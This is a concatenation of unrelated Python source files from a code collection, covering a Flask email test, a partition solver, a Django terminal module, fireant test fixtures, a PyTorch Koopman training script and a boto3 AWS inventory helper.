password='password',
first_name='the',
last_name='user')
register_user(user)
r = api_client.post(url_for('api.resend_confirmation_email'),
data=dict(email=user.email))
assert r.status_code == 204
assert len(outbox) == len(templates) == 2
assert templates[0].template.name == 'security/email/welcome.html'
assert templates[1].template.name == 'security/email/confirmation_instructions.html'
assert templates[0].context.get('confirmation_link') != templates[1].context.get('confirmation_link')
| StarcoderdataPython |
9794900 | # python3
"""
Check whether it is possible to partition natural integers into
three subsets with equal sums
EX: [5, 2, 3, 1, 6, 1] -> [5, 1], [6], [2, 3, 1]
"""
def backtrack(matrix, nums):
used_items = []
unused_items = []
knapsack_w = matrix[-1][-1]
i = len(matrix) - 1
while knapsack_w > 0:
if matrix[i][knapsack_w] != matrix[i - 1][knapsack_w]:
used_items.append(i - 1)
knapsack_w -= nums[i - 1]
else:
unused_items.append(nums[i - 1])
i -= 1
return used_items, unused_items + nums[len(matrix):]
def fill_discrete_knapsack(total_weight, weights):
matrix = [[0] * (total_weight + 1) for _ in range(len(weights) + 1)]
for i in range(1, len(weights) + 1):
for knapsack_w in range(1, total_weight + 1):
num = weights[i - 1]
case_a = matrix[i - 1][knapsack_w]
if num <= knapsack_w:
case_b = matrix[i - 1][knapsack_w - num] + num
else:
case_b = case_a
optimal_num = max(case_a, case_b)
if optimal_num <= knapsack_w:
matrix[i][knapsack_w] = optimal_num
if knapsack_w == total_weight and optimal_num == total_weight:
return matrix[:i + 1]
return matrix if matrix[-1][-1] == total_weight else None
def can_be_partitioned(nums):
nums_sum = sum(nums)
groups = []
if len(nums) < 3 or nums_sum % 3 != 0:
return 0
knapsack_w = nums_sum // 3
# try to fulfil 3 discrete knapsacks (without repetitions)
for _ in range(3):
knapsack = fill_discrete_knapsack(knapsack_w, nums)
if knapsack is None:
return 0
used_items, unused_items = backtrack(knapsack, nums)
groups.append(tuple(nums[i] for i in used_items))
print(groups, unused_items, nums)
nums = [num for i, num in enumerate(nums) if i not in set(used_items)]
# print(groups)
return 1
def test():
assert can_be_partitioned([3, 3, 3, 3]) == 0
assert can_be_partitioned([40]) == 0
assert can_be_partitioned([17, 59, 34, 57, 17, 23, 67, 1, 18, 2, 59]) == 1
assert can_be_partitioned([1, 2, 3, 4, 5, 5, 7, 7, 8, 10, 12, 19, 25]) == 1
# assert can_be_split([10, 10, 10, 7, 7, 7, 7, 7, 7, 6, 6, 6]) == 1
assert can_be_partitioned([1, 1, 1]) == 1
assert can_be_partitioned([0, 0, 0]) == 1
print("OK")
def main():
_n, nums = input(), list(map(int, input().split()))
print(can_be_partitioned(nums))
if __name__ == "__main__":
test()
main()
| StarcoderdataPython |
237637 | <reponame>kamahmad/summer-code-jam-2020<filename>annoyed-alligators/socl_media/apps/terminal/methods.py
from django.shortcuts import redirect
from django.urls import reverse
from GoogleNews import GoogleNews
from .models import NewsHistory
import ast
class TerminalCommand():
"""Container for terminal all terminal commands"""
def __init__(self, command_string: str, request):
self.specified_method = command_string.split()[0]
self.params = command_string[command_string.find(" ") + 1:]
self.request = request
def run(self, **kwargs):
try:
method_to_call = getattr(self, self.specified_method)
response = method_to_call(self.params, **kwargs)
except AttributeError as e:
response = {'response': f"{self.specified_method}: command not found"}
return response
def logout(self, params=None, **kwargs):
redirect = reverse('logout')
message = f"Logged out {self.request.user.username}"
return {'response': message, 'redirect': redirect}
def signup(self, params=None, **kwargs):
if self.request.user.is_authenticated:
message = "Log out to create a new account"
return {'response': message}
else:
redirect = reverse('signup')
message = "enter details to signup"
return {'response': message, 'redirect': redirect}
@staticmethod
def message(params: str = None, **kwargs):
help_text = "message: use this to send messages<br><br>"\
"Usage: message username [args] [message text]<br>"\
"options:<br>"\
"--help: get help (this screen)<br>"\
"--last: view the last message sent to the user<br>"
if params.split()[0] == '--help':
message = help_text
elif params.count(' ') == 0:
message = "Message text not provided <br>"\
"Usage: message username message text"
else:
user = params.split()[0]
message = f"Message delivered to {user}."
return {'response': message}
@staticmethod
def news(topic: str, start_date: str = None, end_date: str = None, **kwargs):
page_num = int(kwargs.get('Page', '0'))
article_num = int(kwargs.get('Article', '0'))
if page_num == 0 and article_num == 0:
try:
NewsHistory.objects.latest('search_time').delete()
except Exception as e:
print("No news history for this user", repr(e))
googlenews = GoogleNews()
googlenews.search(topic)
googlenews.getpage(1)
articles = googlenews.result()
articles = [article for article in articles if len(article['title']) > 10]
db_entry = NewsHistory(user_id=1, search_topic=topic, last_fetched_count=0, news_articles=str(articles))
articles = articles[0:3]
db_entry.save()
else:
news_list = NewsHistory.objects.latest('search_time')
news_items = ast.literal_eval(news_list.news_articles)
if page_num != 0:
article_start_num = page_num * 3
articles = news_items[article_start_num:article_start_num+3]
elif article_num != 0:
article = news_items[article_num - 1]
article_link = '<a href="{}" target="_blank">Read full article</a>'.format(article['link'])
article = "<br>" + "<br>".join([article['title'], article['desc'], article_link])
return {'response': article}
article_text = []
for i, article in enumerate(articles):
serial_number = str(i + 1 + page_num * 3)
article_summary = (serial_number, f"{article['date']}, {article['media']}", article['title'])
article_text.append(article_summary)
all_articles = "<br>".join([", ".join(i) for i in article_text])
return {'response': all_articles, 'followup': True}
| StarcoderdataPython |
3514040 | from utilsPy.utilspackage import moeda
p = float(input('Digite o preço: R$'))
print(f'A metade de {moeda.moeda(p)} é: R${moeda.metade(p)}')
print(f'O dobro de {moeda.moeda(p)} é: R${moeda.dobro(p)}')
print(f'Com um aumento de 10% o valor fica: {moeda.moeda(moeda.aumentar(p, 10))}')
print(f'Com uma redução de 5% o valor fica: {moeda.moeda(moeda.diminuir(p, 5))}')
| StarcoderdataPython |
9620010 | from .ecg_tokenizer import EcgPadder as Padder, EcgTokenizer as Tokenizer
from .ecg_vit import EcgVitConfig, EcgVit, load_trained, EcgVitVisualizer
from . import train
from .evaluate import evaluate_trained, get_eval_path
| StarcoderdataPython |
48783 | from collections import (
OrderedDict,
)
from unittest.mock import Mock
import pandas as pd
from datetime import (
datetime,
)
from fireant import *
from fireant.slicer.references import ReferenceType
from fireant.slicer.totals import get_totals_marker_for_dtype
from fireant.utils import (
format_dimension_key as fd,
format_metric_key as fm,
)
from pypika import (
JoinType,
Table,
functions as fn,
)
class TestDatabase(VerticaDatabase):
# Vertica client that uses the vertica_python driver.
connect = Mock()
def __eq__(self, other):
return isinstance(other, TestDatabase)
test_database = TestDatabase()
politicians_table = Table('politician', schema='politics')
voters_table = Table('voter', schema='politics')
state_table = Table('state', schema='locations')
district_table = Table('district', schema='locations')
deep_join_table = Table('deep', schema='test')
slicer = Slicer(
table=politicians_table,
database=test_database,
joins=(
Join(table=district_table,
criterion=politicians_table.district_id == district_table.id,
join_type=JoinType.outer),
Join(table=district_table,
criterion=politicians_table.district_id == district_table.id,
join_type=JoinType.outer),
Join(table=state_table,
criterion=district_table.state_id == state_table.id),
Join(table=voters_table,
criterion=politicians_table.id == voters_table.politician_id),
Join(table=deep_join_table,
criterion=deep_join_table.id == state_table.ref_id),
),
dimensions=(
DatetimeDimension('timestamp',
label='Timestamp',
definition=politicians_table.timestamp),
DatetimeDimension('timestamp2',
label='Timestamp 2',
definition=politicians_table.timestamp2),
DatetimeDimension('join_timestamp',
label='Join Timestamp',
definition=voters_table.timestamp),
CategoricalDimension('political_party',
label='Party',
definition=politicians_table.political_party,
display_values=(
('d', 'Democrat'),
('r', 'Republican'),
('i', 'Independent'),
('l', 'Libertarian'),
('g', 'Green'),
('c', 'Constitution'))),
UniqueDimension('candidate',
label='Candidate',
definition=politicians_table.candidate_id,
display_definition=politicians_table.candidate_name),
UniqueDimension('election',
label='Election',
definition=politicians_table.election_id,
display_definition=politicians_table.election_year),
UniqueDimension('district',
label='District',
definition=politicians_table.district_id,
display_definition=district_table.district_name),
UniqueDimension('state',
label='State',
definition=district_table.state_id,
display_definition=state_table.state_name),
BooleanDimension('winner',
label='Winner',
definition=politicians_table.is_winner),
UniqueDimension('deepjoin',
definition=deep_join_table.id),
),
metrics=(
Metric('votes',
label='Votes',
definition=fn.Sum(politicians_table.votes)),
Metric('wins',
label='Wins',
definition=fn.Sum(politicians_table.is_winner)),
Metric('voters',
label='Voters',
definition=fn.Count(voters_table.id)),
Metric('turnout',
label='Turnout',
definition=fn.Sum(politicians_table.votes) / fn.Count(voters_table.id),
suffix='%',
precision=2),
Metric('wins_with_suffix_and_prefix',
label='Wins',
definition=fn.Sum(politicians_table.is_winner),
prefix='$',
suffix='€'),
),
)
political_parties = OrderedDict((('d', 'Democrat'),
('r', 'Republican'),
('i', 'Independent'),
('l', 'Libertarian'),
('g', 'Green'),
('c', 'Constitution')))
candidates = OrderedDict(((1, '<NAME>'),
(2, '<NAME>'),
(3, '<NAME>'),
(4, '<NAME>'),
(5, '<NAME>'),
(6, '<NAME>'),
(7, '<NAME>'),
(8, '<NAME>'),
(9, '<NAME>'),
(10, '<NAME>'),
(11, '<NAME>')))
states = OrderedDict(((1, 'Texas'),
(2, 'California')))
elections = OrderedDict(((1, '1996'),
(2, '2000'),
(3, '2004'),
(4, '2008'),
(5, '2012'),
(6, '2016')))
election_candidates = {
1: {'candidates': [1, 2, 3], 'winner': 1},
2: {'candidates': [4, 5], 'winner': 4},
3: {'candidates': [4, 6], 'winner': 4},
4: {'candidates': [7, 8], 'winner': 7},
5: {'candidates': [7, 9], 'winner': 7},
6: {'candidates': [10, 11], 'winner': 10},
}
candidate_parties = {
1: 'd',
2: 'r',
3: 'i',
4: 'r',
5: 'd',
6: 'd',
7: 'd',
8: 'r',
9: 'r',
10: 'r',
11: 'd',
}
election_candidate_state_votes = {
# Texas
(1, 1, 1): 2459683,
(1, 2, 1): 2736167,
(1, 3, 1): 378537,
(2, 4, 1): 3799639,
(2, 5, 1): 2433746,
(3, 4, 1): 4526917,
(3, 6, 1): 2832704,
(4, 7, 1): 3528633,
(4, 8, 1): 4479328,
(5, 7, 1): 4569843,
(5, 9, 1): 3308124,
(6, 10, 1): 4685047,
(6, 11, 1): 387868,
# California
(1, 1, 2): 5119835,
(1, 2, 2): 3828380,
(1, 3, 2): 697847,
(2, 4, 2): 4567429,
(2, 5, 2): 5861203,
(3, 4, 2): 5509826,
(3, 6, 2): 6745485,
(4, 7, 2): 8274473,
(4, 8, 2): 5011781,
(5, 7, 2): 7854285,
(5, 9, 2): 4839958,
(6, 10, 2): 8753788,
(6, 11, 2): 4483810,
}
election_candidate_wins = {
(1, 1): True,
(1, 2): False,
(1, 3): False,
(2, 4): True,
(2, 5): False,
(3, 4): True,
(3, 6): False,
(4, 7): True,
(4, 8): False,
(5, 7): True,
(5, 9): False,
(6, 10): True,
(6, 11): False,
}
df_columns = [fd('timestamp'),
fd('candidate'), fd('candidate_display'),
fd('political_party'),
fd('election'), fd('election_display'),
fd('state'), fd('state_display'),
fd('winner'),
fm('votes'),
fm('wins')]
def PoliticsRow(timestamp, candidate, candidate_display, political_party, election, election_display, state,
state_display, winner, votes, wins):
return (
timestamp, candidate, candidate_display, political_party, election, election_display, state, state_display,
winner, votes, wins
)
records = []
for (election_id, candidate_id, state_id), votes in election_candidate_state_votes.items():
election_year = elections[election_id]
winner = election_candidate_wins[(election_id, candidate_id)]
records.append(PoliticsRow(
timestamp=datetime(int(election_year), 1, 1),
candidate=candidate_id, candidate_display=candidates[candidate_id],
political_party=candidate_parties[candidate_id],
election=election_id, election_display=elections[election_id],
state=state_id, state_display=states[state_id],
winner=winner,
votes=votes,
wins=(1 if winner else 0),
))
mock_politics_database = pd.DataFrame.from_records(records, columns=df_columns)
single_metric_df = pd.DataFrame(mock_politics_database[[fm('votes')]]
.sum()).T
multi_metric_df = pd.DataFrame(mock_politics_database[[fm('votes'), fm('wins')]]
.sum()).T
cont_dim_df = mock_politics_database[[fd('timestamp'), fm('votes'), fm('wins')]] \
.groupby(fd('timestamp')) \
.sum()
no_index_df = pd.DataFrame(cont_dim_df.sum()).T
cat_dim_df = mock_politics_database[[fd('political_party'), fm('votes'), fm('wins')]] \
.groupby(fd('political_party')) \
.sum()
cat_uni_dim_df = mock_politics_database[[fd('political_party'), fd('candidate'), fd('candidate_display'),
fm('votes'), fm('wins')]] \
.groupby([fd('political_party'), fd('candidate'), fd('candidate_display')]) \
.sum() \
.reset_index(fd('candidate_display'))
uni_dim_df = mock_politics_database[[fd('candidate'), fd('candidate_display'), fm('votes'), fm('wins')]] \
.groupby([fd('candidate'), fd('candidate_display')]) \
.sum() \
.reset_index(fd('candidate_display'))
cont_cat_dim_df = mock_politics_database[[fd('timestamp'), fd('political_party'), fm('votes'), fm('wins')]] \
.groupby([fd('timestamp'), fd('political_party')]) \
.sum()
cont_uni_dim_df = mock_politics_database[[fd('timestamp'), fd('state'), fd('state_display'), fm('votes'), fm('wins')]] \
.groupby([fd('timestamp'), fd('state'), fd('state_display')]) \
.sum() \
.reset_index(fd('state_display'))
cont_cat_uni_dim_df = mock_politics_database[[fd('timestamp'), fd('political_party'),
fd('state'), fd('state_display'),
fm('votes'), fm('wins')]] \
.groupby([fd('timestamp'), fd('political_party'), fd('state'), fd('state_display')]) \
.sum() \
.reset_index(fd('state_display'))
cont_dim_operation_df = cont_dim_df.copy()
operation_key = fm('cumsum(votes)')
cont_dim_operation_df[operation_key] = cont_dim_df[fm('votes')].cumsum()
def split(list, i):
return list[:i], list[i:]
def ref(data_frame, columns):
ref_cols = {column: '%s_eoe' % column
for column in columns}
ref_df = data_frame \
.shift(2) \
.rename(columns=ref_cols)[list(ref_cols.values())]
return (cont_uni_dim_df
.copy()
.join(ref_df)
.iloc[2:])
def ref_delta(ref_data_frame, columns):
ref_columns = ['%s_eoe' % column for column in columns]
delta_data_frame = pd.DataFrame(
data=ref_data_frame[ref_columns].values - ref_data_frame[columns].values,
columns=['%s_eoe_delta' % column for column in columns],
index=ref_data_frame.index
)
return ref_data_frame.join(delta_data_frame)
_columns = [fm('votes'), fm('wins')]
cont_uni_dim_ref_df = ref(cont_uni_dim_df, _columns)
cont_uni_dim_ref_delta_df = ref_delta(cont_uni_dim_ref_df, _columns)
def totals(data_frame, dimensions, columns):
"""
Computes the totals across a dimension and adds the total as an extra row.
"""
if not isinstance(data_frame.index, pd.MultiIndex):
totals_marker = get_totals_marker_for_dtype(data_frame.index.dtype)
totals_df = pd.DataFrame([data_frame.sum()],
index=pd.Index([totals_marker],
name=data_frame.index.name))
return data_frame.append(totals_df)
def _totals(df):
if isinstance(df, pd.Series):
return df.sum()
totals_index_value = get_totals_marker_for_dtype(df.index.levels[-1].dtype)
return pd.DataFrame(
[df.sum()],
columns=columns,
index=pd.Index([totals_index_value],
name=df.index.names[-1]))
totals_df = None
for i in range(-1, -1 - len(dimensions), -1):
groupby_levels = data_frame.index.names[:i]
if groupby_levels:
level_totals_df = data_frame[columns].groupby(level=groupby_levels).apply(_totals)
missing_dims = set(data_frame.index.names) - set(level_totals_df.index.names)
if missing_dims:
for dim in missing_dims:
dtype = data_frame.index.levels[data_frame.index.names.index(dim)].dtype
level_totals_df[dim] = get_totals_marker_for_dtype(dtype)
level_totals_df.set_index(dim, append=True, inplace=True)
level_totals_df = level_totals_df.reorder_levels(data_frame.index.names)
else:
totals_index_values = [get_totals_marker_for_dtype(level.dtype)
for level in data_frame.index.levels]
level_totals_df = pd.DataFrame([data_frame[columns].apply(_totals)],
columns=columns,
index=pd.MultiIndex.from_tuples([totals_index_values],
names=data_frame.index.names))
totals_df = totals_df.append(level_totals_df) \
if totals_df is not None \
else level_totals_df
return data_frame.append(totals_df).sort_index()
# Convert all index values to string
for l in list(locals().values()):
if not isinstance(l, pd.DataFrame):
continue
if hasattr(l.index, 'levels'):
l.index = pd.MultiIndex(levels=[level.astype('str')
if not isinstance(level, (pd.DatetimeIndex, pd.RangeIndex))
else level
for level in l.index.levels],
labels=l.index.labels)
elif not isinstance(l.index, (pd.DatetimeIndex, pd.RangeIndex)):
l.index = l.index.astype('str')
cat_dim_totals_df = totals(cat_dim_df, [fd('political_party')], _columns)
cont_cat_dim_totals_df = totals(cont_cat_dim_df, [fd('political_party')], _columns)
cont_cat_dim_all_totals_df = totals(cont_cat_dim_df, [fd('timestamp'), fd('political_party')], _columns)
cont_uni_dim_totals_df = totals(cont_uni_dim_df, [fd('state')], _columns)
cont_uni_dim_all_totals_df = totals(cont_uni_dim_df, [fd('timestamp'), fd('state')], _columns)
cont_cat_uni_dim_all_totals_df = totals(cont_cat_uni_dim_df, [fd('timestamp'), fd('political_party'), fd('state')],
_columns)
ElectionOverElection = ReferenceType('eoe', 'EoE', 'year', 4)
| StarcoderdataPython |
9288 | #!/usr/bin/env python
# coding: utf-8
""" Learning Koopman Invariant Subspace
(c) <NAME>, 2017.
<EMAIL>
"""
import numpy as np
np.random.seed(1234567890)
from argparse import ArgumentParser
from os import path
import time
from lkis import TimeSeriesBatchMaker, KoopmanInvariantSubspaceLearner
from losses import combined_loss
from torch import device, save, manual_seed
from torch.optim import SGD
import matplotlib.pyplot as plt
import seaborn as sns
# -- Parse arguments
t = time.time()
parser = ArgumentParser(description='Learning Koopman Invariant Subspace (Now with PyTorch!)')
parser.add_argument("--name", "-n", type=str, default=f"lkis-{int(time.time())}", help="name of experiment")
parser.add_argument("--data-path", type=str, default="./train.npy", help="time-series data to model")
parser.add_argument("--epochs", "-e", type=int, default=1000, help="number of epochs to train for")
parser.add_argument("--num-batches", "-b", type=int, default=1, help="how many batchs for break the data up into")
parser.add_argument("--gpu", action="store_true", default=False, help="use a GPU or no")
parser.add_argument("--intermediate-observable", "-i", type=int, default=-1, help="intermediate dimensional observation space")
parser.add_argument("--save-model", "-m", action="store_true", default=False, help="whether or not you want the model saved to $name$.torch.mdl")
parser.add_argument("--save-training-plot", "-p", action="store_true", default=False, help="where to save plotting")
parser.add_argument("--max-lag", "-l", type=int, default=-1, help="maximum_lag")
parser.add_argument("--state-space", "-s", type=int, default=1, help="dimensionality of the underlying state space")
parser.add_argument("--alpha", "-a", type=float, default=1.0, help="value to score the reconstruction loss by")
parser.add_argument("--learning-rate", "-r", type=float, default=0.001, help="Optimizer learning rate")
parser.add_argument("--validation-data-path", "-v", type=str, default="")
#ToDo: Implement
parser.add_argument("--dmd", action="store_true", default=False, help="Execute and save the DMD on the training set")
if __name__ == "__main__":
# grab the command line arguments
cli_args = parser.parse_args()
manual_seed(216)
# find and load the training data
data_path = cli_args.data_path
print(f"Loading training data from {data_path}")
data_train = np.load(data_path)
if len(data_train.shape) == 1:
data_train = data_train.reshape(-1, 1)
print(f"Loaded a dataset with dimension: {data_train.shape}")
validate = cli_args.validation_data_path != ""
data_val = None
if validate:
data_path = cli_args.validation_data_path
print(f"Loading validation data from {data_path}")
data_val = np.load(data_path)
# process the delay either set by the user or is set to one 10th of the data
delay = cli_args.max_lag if cli_args.max_lag > 0 else (data_train.shape[0] // 10)
# based on the number of batches, delay, and size of the data compute the samples per batch
samples_per_batch = (data_train.shape[0] - delay) // cli_args.num_batches
# construct the data preparer
batch_iterator = TimeSeriesBatchMaker(
y=data_train,
batch_size=samples_per_batch,
max_lag=delay
)
if validate:
val_batch_iterator = TimeSeriesBatchMaker(
y=data_val,
max_lag=delay
)
# construct the end-to-end model
lkis = KoopmanInvariantSubspaceLearner(
observable_dim=data_train.shape[1],
latent_dim=cli_args.state_space,
intermediate_observable=cli_args.intermediate_observable,
delay=delay
)
if cli_args.gpu:
device = device("cuda")
# initialize the optimizer
optimizer = SGD(lkis.parameters(), lr=cli_args.learning_rate)
losses = []
val_losses = []
for epoch in range(cli_args.epochs):
loss = 0
for b in range(cli_args.num_batches):
optimizer.zero_grad()
time_delayed_ys, y_true = next(batch_iterator)
if cli_args.gpu:
time_delayed_ys.to(device)
y_true.to(device)
g_pred, y_pred = lkis(time_delayed_ys)
g_0 = g_pred[:-1]
g_1 = g_pred[1:]
batch_loss = combined_loss(y_pred=y_pred, y_true=y_true, g_0=g_0, g_1=g_1)
batch_loss.backward()
optimizer.step()
loss += batch_loss.item()
# display the epoch training loss
print(f"epoch : {epoch + 1}/{cli_args.epochs}, loss = {loss:.6f}")
losses.append(loss)
if validate:
y_time_delayed_val, y_true = next(val_batch_iterator)
if cli_args.gpu:
y_time_delayed_val.to(device)
y_true.to(device)
g_pred, y_pred = lkis(y_time_delayed_val)
g_0 = g_pred[:-1]
g_1 = g_pred[1:]
batch_loss = combined_loss(y_pred=y_pred, y_true=y_true, g_0=g_0, g_1=g_1)
val_loss = batch_loss.item()
print(f"\tval-loss = {val_loss:.6f}")
val_losses.append(val_loss)
if cli_args.save_model:
save(lkis, f"{cli_args.name}.torch.mdl")
if cli_args.save_training_plot:
sns.lineplot(x=list(range(cli_args.epochs)), y=losses, label="training loss")
if validate:
sns.lineplot(x=list(range(cli_args.epochs)), y=val_losses, label="validation loss")
plt.xlabel("Epochs")
plt.ylabel("Combined Reconstruction and DMD Loss")
plt.title(f"Training Loss for {cli_args.name}")
plt.savefig(f"{cli_args.name}-training-loss.png")
| StarcoderdataPython |
5176669 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import boto3
import logging
from aai import config as _config
# import utils.aws as aws
log = logging.getLogger('aws-auto-inventory.aws')
def fetch(profile_name, region_name, service, function, result_key, parameters):
log.info('Started: {}:{}:{}:{}:{}'.format(region_name, service, function, result_key, parameters))
response = ""
try:
session = boto3.Session(profile_name=profile_name)
client = session.client(service, region_name=region_name)
if parameters is not None:
if result_key:
response = client.__getattribute__(function)(**parameters).get(result_key)
else:
response = client.__getattribute__(function)(**parameters)
elif result_key:
response = client.__getattribute__(function)().get(result_key)
else:
response = client.__getattribute__(function)()
# Remove ResponseMetadata as it's not useful
response.pop('ResponseMetadata', None)
except Exception as e:
log.error("Error while processing {}, {}.\n{}".format(service, region_name, e))
log.info('Finished:{}:{}:{}:{}'.format(service, region_name, function, result_key))
return response
def get_methods(client):
methods = dir(client)
return methods
def get_read_methods(client):
l=[]
methods = get_methods(client)
for method in methods:
if 'describe' in method or 'list' in method:
l.append(method)
return l
def get(profile_name, region_name, sheet):
# results = []
service = sheet['service']
function = sheet['function']
# optional
result_key = sheet.get('result_key', None)
parameters = sheet.get('parameters', None)
log.info('Started:{}:{}:{}:{}:{}'.format(profile_name, region_name, service, function, result_key))
result = fetch(profile_name=profile_name, region_name=region_name, service=service, function=function, result_key=result_key, parameters=parameters)
# results.append(result)
log.info('Result:{{{}}}'.format(result))
log.info('Finished:{}:{}:{}:{}'.format(region_name, service, function, result_key))
return result
def get_session(profile_name):
session = boto3.Session(profile_name=profile_name)
return session
def get_account_id():
log.info('Started: get_caller_identity')
client = aws.get_session().client('sts')
response = client.get_caller_identity()
account = response['Account']
user_id = response['UserId']
arn = response['Arn']
log.info('Account: {}'.format(account))
log.info('UserId: {}'.format(user_id))
log.info('Arn: {}'.format(arn))
log.info('Finished: get_caller_identity')
return account | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.